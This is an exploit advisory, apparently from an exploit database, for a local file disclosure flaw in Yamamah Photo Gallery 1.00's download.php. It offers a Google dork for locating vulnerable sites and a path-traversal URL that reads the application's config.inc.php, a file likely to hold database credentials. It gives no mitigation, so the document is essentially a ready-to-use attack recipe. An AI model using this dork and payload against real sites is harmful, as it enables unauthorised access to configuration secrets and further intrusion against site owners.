id: 12690
date: 06/13/2010
title: Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure
author: Mat
cves: 

=============================================================================
Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability
=============================================================================


|=---------------------------------------------------------------------------=|
 Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability
|=---------------------------------------------------------------------------=|
|=------------------------------=[ by mat ]=---------------------------------=|
 
Google dork: "Powered By : Yamamah Version 1.00"
 
 
http://[target]/[path]/themes/default/download.php?download=[File Disclosure]
http://[target]/[path]/themes/default/download.php?download=../../includes/config.inc.php



#  0day.today [2023-03-23]  #